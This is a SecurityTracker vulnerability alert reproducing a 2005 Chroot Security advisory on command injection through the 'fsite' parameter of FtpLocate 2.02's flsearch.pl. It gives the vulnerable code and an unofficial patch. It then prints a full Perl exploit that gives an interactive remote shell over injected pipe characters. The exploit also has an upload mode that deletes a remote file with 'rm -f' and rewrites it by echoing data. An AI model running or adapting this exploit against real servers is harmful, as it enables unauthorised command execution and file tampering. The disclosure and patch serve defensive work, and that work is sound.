Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
FtpLocate Lets Remote Users Execute Arbitrary Commands
|
|
SecurityTracker Alert ID: 1014570
|
|
SecurityTracker URL: http://securitytracker.com/id?1014570
|
|
CVE Reference: CVE-2005-2420
(Links to External Site)
|
Updated: Jul 6 2008
|
Original Entry Date: Jul 25 2005
|
Impact: Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 2.02
|
Description: A vulnerability was reported in FtpLocate. A remote user can execute arbitrary commands on the target system.
The 'flsearch.pl' script does not properly validate user-supplied input in the 'fsite' parameter. A remote user can supply a specially
crafted parameter value to execute arbitrary commands on the target system. The commands will run with the privileges of the target
web service.
The vendor was notified on July 15, 2005.
Chroot Security reported this vulnerability.
|
Impact: A remote user can execute arbitrary commands on the target system with the privileges of the target web service.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: turtle.ee.ncku.edu.tw/ftplocate/readme.english.html (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: newbug@securityfocus.com
|
Message History:
None.
|
Source Message Contents
|
Date: Mon, 25 Jul 2005 02:31:59 +0000
From: newbug@securityfocus.com, "[at]"@securityfocus.com,
Subject: Chroot Security Group Advisory 2005-07-25 -- ftplocate
|
Chroot Security Group Advisory 2005-07-25
Remote arbitrary code execution in FtpLocate 2.02 (current)
Summary:
FtpLocate is a ftp search engine supporting filename and description search.
A remote attack can run arbitary commands with the web server's privileges by
exploiting a unfiltered parameter in flsearch.pl.
Details:
FtpLocate contains a vulnerability that can allow an attacker to execute
arbitrary commands. The vulnerability is due to improper input validation of
user-supplied parameters (fsite) by the flsearch.pl script. Remote attackers can run arbitary command
s with the web servers's privieges
by adding a "|" or ";".
Vuln. Systems:
FtpLocate 1.5 - 2.02
Vuln. Code:
---
/ftplocate-2.02/bin/flsearch.pl :
# line 23 - 60
$fsite=clean_str($input{'fsite'}); $fsite_raw=CGI::escape($fsite);
...
if ( $fsite eq "" ) {
...
} else {
$resultfname=$query_raw."-$fsite";
...
}
...
open (L, "$CACHEDIR/$resultfname"); # Game Over 1
---
/ftplocate-2.02/bin/flsearch.pl:
# line 53
do_flsearch($client, $query, $fsite, $resultfname);
/ftplocate-2.02/bin/flmodule.pl:
# line 526 – 537
if ( $fsite eq "" ) {
...
} else {
$optf="-F '$fsite'"; # for glimpse
...
}
# line 537
open(G, "$CMD_GLIMPSE -i -Ny $optf $optw -H $FILELISTDIR -e '$q' 2>/$TMPDIR/flsearch.
tmp.$$|"); # Game Over 2
---
/ftplocate-2.02/bin/flmodule.pl:
# line 584
`$CMD_AGREP -i -e '$q' $setlist_str /dev/null>'$CACHEDIR/$resultfname'`; #
Game Over 3
---
/ftplocate-2.02/bin/flmodule.pl:
# line 589
`$CMD_AGREP -i -e '$q' $setlist_str /dev/null>'$CACHEDIR/$resultfname'`; #
Game Over 4
---
Unofficial Patch:
diff -urN flsearch.pl.orig flsearch.pl
--- flsearch.pl.orig 2005-07-22 17:48:52.502670968 +0800
+++ flsearch.pl 2005-07-22 17:56:00.979532584 +0800
@@ -20,7 +20,10 @@
$starttime=gettimeofday(); $starttimestr=timestr();
$query=clean_str($input{'query'}); $query_raw=CGI::escape($query); -$fsite=clean
_str($input{'fsite'}); $fsite_raw=CGI::escape($fsite);
+$fsite=clean_str($input{'fsite'});
+# dangerous characters
+$fsite =~ s/[\/\"\'\`\|\<\>\\\(\)\[\]\{\}\$\s;&]//g;
+$fsite_raw=CGI::escape($fsite); $page=$input{
'page'};
$client=ip2fqdn(client_ip());
Vendor Response: 2005.07.15
Vendor notified via email.
2005.07.19 Vendor notified via email, again.
2005.07.25 No response. Advisory released.
Exploit Code:
#!/usr/bin/perl
# FtpLocate <= 2.02 (current) remote exploit
# VERY PRIVATE VERSION
# DO NOT DISTRIBUTE
# newbug Tseng [at] chroot.org
sub my_socket
{
my $s=IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 80,
Proto => "tcp") or die "socket: ";
sub ch2hex
{
$chr = $_[0];
$out="";
for($i=0;$i<length($chr);$i++)
{
$ch = substr($chr,$i,1);
if($ch eq "\"")
{
$out.="%5c%22";
}
elsif($ch eq "\$")
{
$out.="%5c%24";
}
elsif($ch eq "\@")
{
$out.="%5c%40";
}
else
{
$out.="%".sprintf("%2.2x",ord($ch));
}
}
$out;
sub upload_file
{
print "local file: ";
chomp($lfile = <STDIN>);
print "remote file: ";
chomp($rfile = <STDIN>);
my $socket = &my_socket($host);
print $socket "GET $cgi?query=xx\&fsite=|rm%20-f%20$rfile| $junk";
close $socket;
print "remove $host:$rfile done.\n";
my @DATA = `cat $lfile`;
$num=1;
$total = scalar @DATA;
foreach $DATA (@DATA)
{
$DATA = &ch2hex($DATA);
my $socket = &my_socket($host);
print $socket "GET $cgi?query=xx\&fsite=|echo%20\"$DATA\"%20>>
$rfile| $junk";
print "Send lfile \"$lfile\" to $host:$rfile ... ($num/$total)\n"
;
sleep(1);
close $socket;
$num++;
}
}
use IO::Socket::INET;
print "FtpLocate flsearch.pl remote exploit\n";
print "host: ";
chomp ($host = <STDIN>);
print "port (80): ";
chomp ($port = <STDIN>);
if($port eq "")
{
$port = 80;
}
print "version 1.0/1.1 (1.0): ";
chomp ($ver = <STDIN>);
if($ver eq "")
{
$ver = "1.0";
print "cmd/upload (cmd): "; chomp ($opt
= <STDIN>);
if($opt eq "") {
$opt = "cmd";
print "cgi path (/cgi-bin/ftplocate/flsearch.pl): ";
chomp ($cgi = <STDIN>);
if($cgi eq "")
{
$cgi = "/cgi-bin/ftplocate/flsearch.pl";
if($ver eq "1.0")
{
$junk = "HTTP/1.0\n\n";
else
$junk = "HTTP/1.1\nHost: $host\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1
.4) Gecko/20030624 Netscape/7.1\nAccept:
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/pn
g,image/jpeg,image/gif;q=0.2,*/*;q=0.1\nAccept-Language:
zh-tw,en-us;q=0.7,en;q=0.3\nAccept-Encoding: gzip,deflate\nAccept-Charset: Big5,utf-8;q=0.7,*;q=0.7\
nKeep-Alive: 300\nConnection:
keep-alive\n\n"; }
if($opt eq "cmd")
while(1){
print "h4ck3r\@[$host]:~\$ ";
chomp ($cmd = <STDIN>);
if($cmd ne "")
{
print "Send command \"$cmd\" to $host ...\n";
$socket = &my_socket($host);
$cmd =~ s/\s/%20/g;
print $socket "GET $cgi?query=xx\&fsite=|$cmd| $junk";
print "done.\n";
}
}
elsif($opt eq "upload")
{
&upload_file($lfile);
print "done.\n";
|
|
Go to the Top of This SecurityTracker Archive Page
|
